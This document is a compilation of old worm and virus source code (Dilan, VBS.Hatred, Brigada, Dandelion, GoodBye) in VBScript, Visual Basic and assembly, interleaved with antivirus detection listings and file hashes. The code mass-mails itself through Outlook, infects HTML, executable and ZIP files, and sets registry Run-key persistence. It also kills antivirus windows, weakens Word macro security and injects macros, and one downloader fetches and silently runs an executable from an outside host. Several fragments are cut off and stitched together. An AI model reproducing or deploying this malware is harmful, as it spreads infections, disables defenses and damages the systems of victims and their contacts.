db'gd.Close',CRLF
db'Else',CRLF
db'gd.Close',CRLF
db'End If',CRLF
db'End If',CRLF
db'Next',CRLF
db'End If',CRLF
db'End Function',CRLF,CRLF
db'Function dec(octe)',CRLF
db'On Error Resume Next',CRLF
db'For hexad = 1 To Len(octe) Step 2',CRLF
db'dec = dec & Chr("&h" & Mid(octe, hexad, 2))',CRLF
db'Next',CRLF
db 'End Function',CRLF
db '</script></body></html>',CRLF
e_htm:
ends
end start
DILAN.HTM
<dilan>
<html><head><title>Only For You!</title></head><body>
<script language=vbscript>
Set fso=createobject("scripting.filesystemobject")
Set ws=createobject("wscript.shell")
document.write "<font face size='4' color=black>You need ActiveX enabled to see this
file<br><a href='javascript:location.reload()'>Click Here</a> to reload and CLICK
YES</font>"
Else
asmhex="4D5A50000200000004000F00FFFF..."
read = dec(asmhex)
Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2)
r.Write read
r.Close
ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\sc
anner.exe"
infect(ws.SpecialFolders("MyDocuments"))
infect(ws.SpecialFolders("Desktop"))
MsgBox "Sorry but your browser can't read this Web file."
End If
Function infect(dir)
For each cible in fso.GetFolder(dir).Files
ext=lcase(fso.GetExtensionName(cible.Name))
If ext="htm" or ext="html" Then
Set gd=fso.OpenTextFile(cible.path,1)
If gd.readline <> "<dilan>" Then
htmorg=gd.Readall
gd.Close
Set gd=fso.OpenTextFile(cible.path,2)
gd.WriteLine "<dilan>"
gd.Write(htmorg)
gd.WriteLine document.body.createtextrange.htmltext
gd.Close
Else
gd.Close
End If
End If
Next
End If
End Function
Function dec(octe)
Next
End Function
File Dilan.exe received on 05.16.2009 11:30:36 (CET)
a-squared 4.0.0.101 2009.05.16 Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win-Trojan/Dilna.5120
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.B2
Authentium 5.1.2.4 2009.05.15 W32/Dilan.A
Avast 4.8.1335.0 2009.05.15 Win32:Petik-B
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.B
BitDefender 7.2 2009.05.16 Win32.Petik.J@mm
CAT-QuickHeal 10.00 2009.05.15 Worm.Petik.b
ClamAV 0.94.1 2009.05.15 Worm.Petik.B
Comodo 1157 2009.05.08 Worm.Win32.Petik.AD
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.20480
eSafe 7.0.17.0 2009.05.14 Win32.Petik.b
F-Prot 4.4.4.56 2009.05.15 W32/Dilan.A
F-Secure 8.0.14470.0 2009.05.15 Worm.Win32.Petik.b
Fortinet 3.117.0.0 2009.05.16 W32/Petik.F
GData 19 2009.05.16 Win32.Petik.J@mm
Ikarus T3.1.1.49.0 2009.05.16 Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Worm.Win32.Petik.b
Kaspersky 7.0.0.125 2009.05.16 Worm.Win32.Petik.b
McAfee 5616 2009.05.15 W32/PetTick.aj
McAfee+Artemis 5616 2009.05.15 W32/PetTick.aj
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.B2
Microsoft 1.4602 2009.05.16 Worm:Win32/Dilna.A
NOD32 4080 2009.05.15 Win32/Petik.AD
Norman 6.01.05 2009.05.16 W32/Pet_Tick.Int
nProtect 2009.1.8.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Win32.Petik.b
Sophos 4.41.0 2009.05.16 W32/Dilna-A
Sunbelt 3.2.1858.2 2009.05.16 Worm.Win32.Petik.b
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik.b
TrendMicro 8.950.0.1092 2009.05.15 TROJ_DILNA.A
VBA32 3.12.10.5 2009.05.16 Worm.Win32.Petik.b
ViRobot 2009.5.15.1737 2009.05.15 Worm.Win32.Petik.5120
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Petdil.A
MD5...: e56a9313f5b25300de504cdce5c84bd8
SHA1..: 6901d7cc53cc5a3223fd9efe399082b119e80cf6
' Name : VBS.Hatred
' Author : PetiK
' Language : VBS
' Date : 29/06/2002
orig=WScript.ScriptFullName
fcopy=fso.GetSpecialFolder(0) & "\LoveVSHatred.vbs"
Call Copy(orig,fcopy)
If orig=fcopy Then
list(ws.SpecialFolders("MyDocuments"))
list(fso.GetSpecialFolder(0))
Do
For each c In map.AddressLists
If c.AddressEntries.Count <> 0 Then
For d = 1 To c.AddressEntries.Count
Set wpalr = out.CreateItem(0)
wpalr.To = c.AddressEntries(d).Address
wpalr.Subject = "Love or Hatred"
wpalr.Body = "Open this file and choice..."
wpalr.Attachments.Add(WScript.ScriptFullName)
wpalr.DeleteAfterSubmit = True
If wpalr.To <> "" Then
wpalr.Send
End If
Next
End If
Next
Loop
End If
Sub Copy(src,dst)
fso.CopyFile orig,fcopy
ws.RegWrite "HKLM\Software\Microsoft\Windows\Currentversion\Run\LVSH",fcopy
End Sub
Sub list(dir)
For Each f1 In fso.GetFolder(dir).SubFolders
infect(f1.Path)
list(f1.Path)
Next
End Sub
Sub infect(dir)
For Each fil In fso.GetFolder(dir).Files
ext = fso.GetExtensionName(fil.Path)
ext = lCase(ext)
If (ext = "htm") or (ext = "html") Then
Set h=fso.OpenTextFile(fil.Path,1)
scnm=h.ReadAll
h.Close
For j = 1 To Len(scnm)
If Mid(scnm, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(scnm, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(scnm, j + 7 + cnt, 1)
cnt = cnt + 1
Loop
SendMail(mlto)
End If
Next
End If
Next
End Sub
Sub SendMail(email)
Dim out
mel.To = email
mel.Subject = "Love or Hatred ??"
mel.Body = "Open this attached file and you will know if you have the love or the hatred"
mel.Attachments.Add(WScript.ScriptFullName)
mel.Attachments.Add (WScript.ScriptFullName)
mel.Send
Set out = Nothing
End Sub
Encrypted version
Execute Q("4F6E204572726F7220526573756D65204E6...57874A456E6420537562")
Function Q(swpe)
For O=1 To Len(swpe) Step 2
Q=Q & Chr("&h" & Mid(swpe,O,2))
Next
End Function
'Encrypt with the PetiK's VBS Hex Convert Tool

File Hatred.vbs received on 05.16.2009 17:42:47 (CET)
a-squared 4.0.0.101 2009.05.16 Email-Worm.VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Kristen
AntiVir 7.9.0.168 2009.05.15 Worm/Lee-based.3
Authentium 5.1.2.4 2009.05.16 VBS/Kristen.G@mm
Avast 4.8.1335.0 2009.05.15 VBS:VBSWG family@enc
AVG 8.5.0.336 2009.05.15 Worm/Generic_c.IH
BitDefender 7.2 2009.05.16 VBS.Hatred.A@mm
CAT-QuickHeal 10.00 2009.05.15 VBS/Kristen.G
ClamAV 0.94.1 2009.05.16 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Kristen.G
F-Prot 4.4.4.56 2009.05.16 VBS/Kristen.G@mm
Fortinet 3.117.0.0 2009.05.16 VBS/Anjulie.C
GData 19 2009.05.16 VBS.Hatred.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.VBS.Lee.Based
K7AntiVirus 7.10.737 2009.05.16 -
McAfee 5616 2009.05.15 VBS/LoveLetter.gen
McAfee+Artemis 5616 2009.05.15 VBS/LoveLetter.gen
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Lee-based.3
Microsoft 1.4602 2009.05.16 Virus:VBS/Leebased
NOD32 4080 2009.05.15 VBS/Lee-based
Norman 6.01.05 2009.05.16 VBS/Lee-based.U
nProtect 2009.1.8.0 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 Virtool.Hex2VBS.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.VBS.Lee-based.n
Sophos 4.41.0 2009.05.16 VBS/Hatred-A
Sunbelt 3.2.1858.2 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 VBS/LoveLetter.gen
TrendMicro 8.950.0.1092 2009.05.15 VBS_ANJULIE.C
VBA32 3.12.10.5 2009.05.16 Email-Worm.VBS.Lee-based
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 Virtool.Hex2VBS.A
MD5...: 0917a7ca2afb01dc26afc99f642c0b6f
SHA1..: aa809d611ba4ba26e9c4d65aeba3239888a0da79
' Name : W32.HLLW.Brigada
' Author : PetiK & alc0paul
' Date : 02/07/2002
'
'
'
'
Option Explicit
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As
Any, ByVal ByteLen As Long)
Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long)
As Long
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As
Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName
As String, ByVal lpWindowName As String) As Long
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal
dwReserved As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal
bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long,
lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const WM_CLOSE = &H10
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Const EWX_SHUTDOWN = 1
Const CSIDL_PERSONAL = &H5
Const CSIDL_TIF = &H20
Const CSIDL_WIN = &H24
Const CSIDL_WINSYS = &H25
Const MAX_PATH = 260
cb As Long
abID As Byte
End Type
mkid As SHITEMID
End Type
Sub Main()
Dim vdir As String
Dim lenhost As String
Dim vc As String
Dim mark As String
Dim hostlen As String
Dim virlen As String
Dim buffhostlen As String
Dim buffvirlen As String
Call regcall
Call killav
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WIN) & "\Ms0701i32.exe"
FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe"
'--------------- check if virus or worm ------------------------
Open vdir & App.EXEName & ".exe" For Binary Access Read As #1
lenhost = (LOF(1))
vc = Space(lenhost)
Get #1, , vc
Close #1
mark = Right(vc, 2)
If mark <> "b8" Then
'worm
Call extrkzip
If InStr(1, GetCommLine, "-petikb8") = 0 Then
Else
Call wording
Call zipinfect
End If
If InStr(1, GetCommLine, "-alcopaulb8") = 0 Then
Else
Call virustime
End If
If InStr(1, GetCommLine, "-trojanmode") = 0 Then
Else
ShutdownWindows EWX_SHUTDOWN
End If
listht GetSpecialfolder(CSIDL_TIF)
Else
'virus : execute the host
hostlen = (LOF(4) - 75264)
virlen = (75264) 'worm/virus + zip component
buffhostlen = Space(hostlen)
buffvirlen = Space(virlen)
Get #4, , buffvirlen
Get #4, , buffhostlen
Close #4
Open vdir & "XxX.exe" For Binary Access Write As #3
Put #3, , buffhostlen
Close #3
'borrowed from murkry's vb5 virus
idProg = Shell(vdir & "XxX.exe", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill vdir & "XxX.exe"
End If
'-------------------------------------------------------------------
Call downloader
End Sub
'---------------------- kill avs --------------------------------------
Sub killav()
Dim avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11, avn12
Dim aWindow As Long
Dim angReturnValue As Long
Dim num3, arrr3, av
avn = "Pop3trap"
avn1 = "JavaScan"
avn2 = "Modem Booster"
avn3 = "vettray"
avn4 = "Timer"
avn5 = "CD-Rom Monitor"
avn6 = "F-STOPW Version 5.06c"
avn7 = "PC-cillin 2000 : Virus Alert"
avn8 = "DAPDownloadManager"
avn9 = "Real-time Scan"
avn10 = "IOMON98"
avn11 = "AVP Monitor"
avn12 = "NAI_VS_STAT"
For num3 = 0 To 12
arrr3 = Array(avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11,
avn12)
av = arrr3(num3)
aWindow = FindWindow(vbNullString, av)
angReturnValue = PostMessage(aWindow, WM_CLOSE, vbNull, vbNull)
Next num3
End Sub
'-------------------------- download update and run it ----------------------
Sub downloader()
Dim databyte() As Byte
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo xIt
Form1.Inet1.RequestTimeout = 40
databyte() = Form1.Inet1.OpenURL("http://p0th0le.tripod.com/a.exe", icByteArray)
Open "c:\update.exe" For Binary Access Write As #2
Put #2, , databyte()
Close #2
Shell "c:\update.exe", vbHide
xIt:
End Sub
'----------------------c:\WINDOWS file infection----------------
Sub virustime()
Dim vdir As String
Dim sfile As String
Dim a As String
Dim arr1
Dim lenhost As String
Dim vc As String
Dim mark As String
Dim host
vdir = App.path
sfile = dir$(GetSpecialfolder(CSIDL_WIN) & "\*.exe")
While sfile <> ""
a = a & sfile & "/"
sfile = dir$
Wend
arr1 = Split(a, "/")
For Each host In arr1
Open GetSpecialfolder(CSIDL_WIN) & "\" & host For Binary Access Read As #1
lenhost = (LOF(1))
vc = Space(lenhost)
Get #1, , vc
Close #1
mark = Right(vc, 2)
If mark <> "b8" Then
GoTo notinfected
Else
GoTo gggoop
End If
notinfected:
infect (GetSpecialfolder(CSIDL_WIN) & "\" & host)
Exit For
gggoop:
Next host
End Sub
Function infect(hostpath As String)
Dim ffile
Dim hostcode As String
Dim vir As String
Dim vircode As String
Dim header As String
Dim f As String
vir = App.path
If Right(vir, 1) <> "\" Then vir = vir & "\"
Open hostpath For Binary Access Read As #1
hostcode = Space(LOF(1))
Get #1, , hostcode
Close #1
Open vir & App.EXEName & ".exe" For Binary Access Read As #2
header = Space(LOF(2))
Get #2, , header
Close #2
f = "b8"
Open hostpath For Binary Access Write As #3
Put #3, , header
Put #3, , hostcode
Put #3, , f
Close #3
End Function
'--------------------zip infection-----------------------------
Sub zipinfect()
list ("c:\")
End Sub
Sub list(dir)
Dim fso, ssf, fil
Set ssf = fso.GetFolder(dir).SubFolders
For Each fil In ssf
infection (fil.path)
list (fil.path)
Next
End Sub
Sub infection(dir)
Dim fso, cf, fil, ext
Set cf = fso.GetFolder(dir).Files
For Each fil In cf
ext = fso.GetExtensionName(fil.path)
ext = LCase(ext)
If (ext = "zip") Then
Shell "c:\piss.exe " & fil.path & " " & GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe",
vbHide
End If
Next
End Sub
'--------------------trojan mode payload-----------------------------
Sub ShutdownWindows(ByVal intParamater As Integer)
Dim blnReturn As Boolean
blnReturn = ExitWindowsEx(intParamater, 0)
End Sub
'--------------------variable commandline-----------------------------
Sub regcall()
Dim b As String, c As String, d As String, ws As Object
Dim regcol, final
b = "-alcopaulb8"
c = "-petikb8"
d = "-trojanmode"
regcol = Array(b, c, d)
Randomize
final = regcol(Int(Rnd * 3))
ws.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\b8",
GetSpecialfolder(CSIDL_WINSYS) & "\Ms0701i32.exe " & final
If dir("c:\regedit.exe") <> "regedit.exe" Then
FileCopy GetSpecialfolder(CSIDL_WIN) & "\regedit.exe", "c:\regedit.exe"
End If
End Sub
'--------------------extract zip software-----------------------------
Sub extrkzip()
Dim vdir As String
Dim wormlen As String
Dim rarlen As String
Dim buffwormlen As String
Dim buffrarlen As String
vdir = App.path
wormlen = (LOF(1) - 63488)
rarlen = (63488)
buffwormlen = Space(wormlen)
buffrarlen = Space(rarlen)
Get #1, , buffwormlen
Get #1, , buffrarlen
Close #1
Open "c:\piss.exe" For Binary Access Write As #2
Put #2, , buffrarlen
Close #2
Shell "c:\piss.exe c:\brigada8.zip " & vdir & App.EXEName & ".exe", vbHide
End Sub
'--------------------e-mail collect and e-mailing-----------------------------
Sub listht(dir)
Dim fso, ssfh, filh
Set ssfh = fso.GetFolder(dir).SubFolders
For Each filh In ssfh
infht (filh.path)
listht (filh.path)
Next
End Sub
Sub infht(dir)
Dim mlto As String
Dim fso, cfh, filh, ext, textline, q
Dim j As Long, cnt As Long
Set cfh = fso.GetFolder(dir).Files
For Each filh In cfh
ext = fso.GetExtensionName(filh.path)
ext = LCase(ext)
If (ext = "htm") Or (ext = "html") Then
Open filh.path For Input As #1
Do While Not EOF(1)
Line Input #1, textline
q = q & textline
Loop
Close #1
For j = 1 To Len(q)
If Mid(q, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(q, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(q, j + 7 + cnt, 1)
cnt = cnt + 1
Loop
Call Worming(mlto)
End If
Next
End If
Next
End Sub
Function Worming(mail As String)
Dim a, b, c
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
Set c = a.CreateItem(0)
c.Recipients.Add mail
c.Subject = "check us out"
c.Body = "we exist to give everyone a smiley face... :)"
c.Attachments.Add "c:\brigada8.zip"
c.Send
c.DeleteAfterSubmit = True
b.Logoff
End If
End Function
'--------------------commandline parser-----------------------------
Private Function GetCommLine() As String
Dim RetStr As Long, SLen As Long
Dim Buffer As String
RetStr = GetCommandLine
SLen = lstrlen(RetStr)
If SLen > 0 Then
GetCommLine = Space$(SLen)
CopyMemory ByVal GetCommLine, ByVal RetStr, SLen
End If
End Function
'--------------------get special folder-----------------------------
Dim r As Long
Dim path As String
If r = 0 Then
path$ = Space$(512)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal path$)
GetSpecialfolder = Left$(path, InStr(path, Chr$(0)) - 1)
Exit Function
End If
End Function
'------------------ document infection ---------------------------
Sub wording()
Dim vdir As String
vdir = App.path
FileCopy vdir & App.EXEName & ".exe", "c:\XXXview.exe"
Open "c:\v.r" For Output As #2
Print #2, "REGEDIT4"
Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #2, """Level""=dword:00000001"
Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #2, """Level""=dword:00000001"
Print #2, """AccessVBOM""=dword:00000001"
Close #2
Shell "c:\regedit.exe /s c:\v.r", vbHide
Kill "c:\v.r"
Open "c:\nl.tmp" For Output As #9
Print #9, "Sub document_close()"
Print #9, "Open ""c:\xp.exp"" For Output As 2"
Print #9, "Print #2, ""sub document_open()"""
Print #9, "Print #2, ""On Error Resume Next"""
Print #9, "Print #2, ""jbo = ActiveDocument.Shapes(1).OLEFormat.ClassType"""
Print #9, "Print #2, ""With ActiveDocument.Shapes(1).OLEFormat"""
Print #9, "Print #2, "" .ActivateAs ClassType:=jbo"""
Print #9, "Print #2, "" .Activate"""
Print #9, "Print #2, ""End With"""
Print #9, "Print #2, ""end sub"""
Print #9, "Close 2"
Print #9, "Set fso = CreateObject(""Scripting.FileSystemObject"")"
Print #9, "Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule"
Print #9, "Set iw = fso.OpenTextFile(""c:\xp.exp"", 1, True)"
Print #9, "nt.DeleteLines 1, nt.CountOfLines"
Print #9, "i = 1"
Print #9, "Do While iw.atendofstream <> True"
Print #9, "b = iw.readline"
Print #9, "nt.InsertLines i, b"
Print #9, "i = i + 1"
Print #9, "Loop"
Print #9, "ActiveDocument.Shapes.AddOLEObject _"
Print #9, "FileName:=""c:\XXXview.exe"", _"
Print #9, "LinkToFile:=False"
Print #9, "ActiveDocument.Save"
Print #9, "Open ""c:\b8.r"" For Output As #3"
Print #9, "Print #3, ""REGEDIT4"""
Print #9, "Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"""
Print #9, "Print #3, """"""Level""""=dword:00000001"""
Print #9, "Print #3,
""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"""
Print #9, "Print #3, """"""Level""""=dword:00000001"""
Print #9, "Print #3, """"""AccessVBOM""""=dword:00000001"""
Print #9, "Close #3"
Print #9, "Shell ""c:\regedit.exe /s c:\b8.r"", vbHide"
Print #9, "Kill ""c:\b8.r"""
Print #9, "End Sub"
Close #9
Open GetSpecialfolder(CSIDL_STARTUP) & "\startup.vbs" For Output As #6
Print #6, "Set fso = CreateObject(""Scripting.FileSystemObject"")"
Print #6, "Set oword = CreateObject(""Word.Application"")"
Print #6, "oword.Visible = False"
Print #6, "Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule"
Print #6, "Set iw = fso.OpenTextFile(""c:\nl.tmp"", 1, True)"
Print #6, "nt.DeleteLines 1, nt.CountOfLines"
Print #6, "i = 1"
Print #6, "Do While iw.atendofstream <> True"
Print #6, "b = iw.readline"
Print #6, "nt.InsertLines i, b"
Print #6, "i = i + 1"
Print #6, "Loop"
Print #6, "oword.NormalTemplate.Save"
Print #6, "oword.NormalTemplate.Close"
Print #6, "oword.quit"
Close #6
End Sub
File Brigada.exe received on 05.16.2009 11:20:53 (CET)

a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Alcaul!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/CrazyBox.worm.75264
AntiVir 7.9.0.168 2009.05.15 Worm/Alcaul.T1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Alcaul
Authentium 5.1.2.4 2009.05.15 W32/Malware!7ad5
Avast 4.8.1335.0 2009.05.15 Win32:Alcaul-AG
AVG 8.5.0.336 2009.05.15 Win32/Alcarys
BitDefender 7.2 2009.05.16 Win32.Alcaul.TB@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Alcaul.t
Comodo 1157 2009.05.08 Worm.Win32.Petal.A
eTrust-Vet 31.6.6508 2009.05.16 Win32/Alcaul
F-Prot 4.4.4.56 2009.05.15 W32/Malware!7ad5
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Alcaul.t
Fortinet 3.117.0.0 2009.05.16 W32/Alcaul.T!worm
GData 19 2009.05.16 Win32.Alcaul.TB@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Alcaul
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Alcaul.t
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Alcaul.t
McAfee 5616 2009.05.15 W32/Alcop.ai@MM
McAfee+Artemis 5616 2009.05.15 W32/Alcop.ai@MM
Microsoft 1.4602 2009.05.16 Worm:Win32/Alcolita.A@mm
NOD32 4080 2009.05.15 Win32/Petal.A
Norman 6.01.05 2009.05.16 Alcaul.AZ@mm
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Alcaul.75264
Panda 10.0.0.14 2009.05.15 Worm Generic.LC
PCTools 4.4.2.0 2009.05.15 Worm.Alcaul
Rising 21.29.52.00 2009.05.16 Worm.Mail.Alcaul.bl
Sophos 4.41.0 2009.05.16 W32/Alcaul-V
Sunbelt 3.2.1858.2 2009.05.16 W32.Alcaul.Worm
Symantec 1.4.4.12 2009.05.16 W32.Alcaul.Worm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_CRAZYBOX.A
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Alcaul.t
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Alcop.CD
MD5...: 0a8cdb77f334f3f5d542509ed70ace70
SHA1..: 95e493da53b720985007df8f28817b94b7d9a902
comment #
Name : I-Worm.Dandelion
Author : PetiK
Date : November 7th
Size : 6144 byte

* WINDOWS\SYSTEM\Explor.exe
* MS Explor = WINDOWS\SYSTEM\Explor.exe
In each run, it copies itself with a randome name on %windows% path. It record
the name into the file "dandelion.txt" in the same folder.

Look at the file Del_Dandelion.vbs
To built the worm :

@echo off
tasm32 /ml /m9 Dandelion
tlink32 -Tpe -c -x -aa Dandelion,,,import32,dllz.def
upx -9 Dandelion.exe
Notes of the authors:
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
start:
twin_worm:
push 50
push esi
push 0

push edi
push 50
push edi
add edi,eax
mov eax,"pxE\"
stosd
mov eax,".rol"
stosd
mov eax,"exe"
stosd
pop edi ; edi =
push 0
push edi
push esi
api CopyFileA ; copy itself
push 9
push edi
push 1
@pushsz "MS Explor"
push 80000002h
end_twin:
; call spread_computer
call htm_file
end_worm:
push 0
api ExitProcess
spread_computer proc
pushad
call generator_name
mov edi,offset genname
push 50
push offset windir
push offset windir
push 0
push edi
api CopyFileA
@pushsz "dandelion.txt"
@pushsz "A New Copy Of Worm.Dandelion"
push edi
@pushsz "Copy Of Worm"
end_spread_computer:
popad
ret
generator_name:
mov edi,offset genname
api GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
gen_name:
push ecx
api GetTickCount
push 'Z'-'A'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'A'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop gen_name
mov eax,'exe.'
stosd
ret
spread_computer endp
htm_file proc
pushad
mov edi,offset ptkdir
push edi
push 50
push edi
add edi,eax
mov eax,"glP\"
stosd
mov eax,"KTP_"
stosd
pop edi
push edi
api CreateDirectoryA
push edi
create_htm:
@pushsz "\WinPatch.htm"
push offset ptkdir
api lstrcat
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push offset ptkdir
api CreateFileA
mov [hHTM],eax
push 0
push offset byte
push e_htm - s_htm
push offset s_htm
push [hHTM]
api WriteFile
push [hHTM]
api CloseHandle
end_htm_file:
popad
ret
htm_file endp
.data
; === copy_worm ===
; === spread_computer ===

windir db 50 dup (0)
genname db 15 dup (?)
; === htm_file ===

ptkdir db 50 dup (0)
hHTM dd ?
byte dd ?
s_htm: db '<HTML><HEAD><TITLE>Windows98</TITLE></HEAD>',CRLF
db '<BODY TEXT=yellow LINK=red VLINK=red BGCOLOR="#000080">',CRLF
db '<P ALIGN="RIGHT">',CRLF
db '<A HREF="http://www.microsoft.com/isapi/redir.dll?'
db 'prd=windows98&clcid=&pver=4.10&ar=wallpaper">',CRLF
db '<IMG SRC="res://membg.dll/membg.gif" BORDER=0 WIDTH=329 HEIGHT=47></A> '
db '</P>',CRLF
db '</BODY>',CRLF
db '<P ALIGN="CENTER">',CRLF
db '<script language=vbscript>',CRLF
db 'on error resume next',CRLF
db 'set fso=createobject("scripting.filesystemobject")',CRLF
db 'if err.number=429 then',CRLF
db 'document.write "<font>Please accept the ActiveX to see this HTML wallpaper !'
db '<br><a href =''javascript:location.reload()''>CLICK HERE</a> to reload and '
db 'click yes</font>"',CRLF
db 'else',CRLF
db 'document.write "<font>Click on the Windows logo to download the new patch.'
db '<br>This patch correct the bug about the IIS and MIME.<br><br></font>"',CRLF
db 'document.write "<font>(You must be connected tp inet !!)</font>"',CRLF
db 'end if',CRLF
db '</script>',CRLF
db '</HTML>',CRLF
e_htm:
signature db "I-Worm.Dandelion "
end start
end
'VBS.GoodBye Written in France.
'My last Worm. I say Good Bye
dim w,f,win,sys,file
Set wo=fso.GetFile(WScript.ScriptFullName)
If wo <> (sys&"\Cmmon32.vbs") Then
MsgBox "Look at this new Game",vbinformation,"New Game For You"
img="4D5A50000200000004000F00FFFF0000.."
lire=decr(img)
Set pic=fso.CreateTextFile(win&"\New_Prog.exe",true)
pic.Write lire
pic.Close
'w.Run win&"\New_Prog.exe",1,false
MsgBox "Script : "&wo&vbCrLf&"Error : Cannot read this script"&vbCrLf&"Code :
800A000D",vbcritical,"Windows Script Host"
End If
If not fso.FolderExists(sys&"\Plg_PTK") Then

fso.CreateFolder(sys&"\Plg_PTK")
End If
x=0
do while x<100
a=x
extension
wo.Copy(sys&"\Plg_PTK\Save"&a&crext)
x=x+1
loop
wo.Copy(sys&"\Cmmon32.vbs")
wo.Copy(sys&"\Plg_PTK\Important.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS Cmmon32")
w.RegWrite run,("wscript "&sys&"\Cmmon32.vbs")
If Day(Now)=11 and Month(Now)=9 Then

w.RegDelete ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS Cmmon32")
End If
cache=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Cache")
desktop=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Desktop")
personal=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Personal")
progfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
commonfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\CommonFilesDir")
Mail(win)
Mail(sys)
Mail(tmp)
Mail(cache)
Mail(desktop)
Mail(personal)
Mail(progfile)
Mail(commonfile)
WormM ""
Function extension
text="ComExeBatDocXlsPptTifBmpJpgGifHtmHttMp3WavMid"
randomize (timer)
tfile=int(rnd(1)*14)+1
crext="."& mid(text,((tfile-1)*3)+1,3)
crext=crext&".vbs"
End Function
Function decr(octet)
For hexa=1 To Len(octet) Step 2
decr=decr & Chr("&h" & Mid(octet, hexa, 2))
Next
End Function
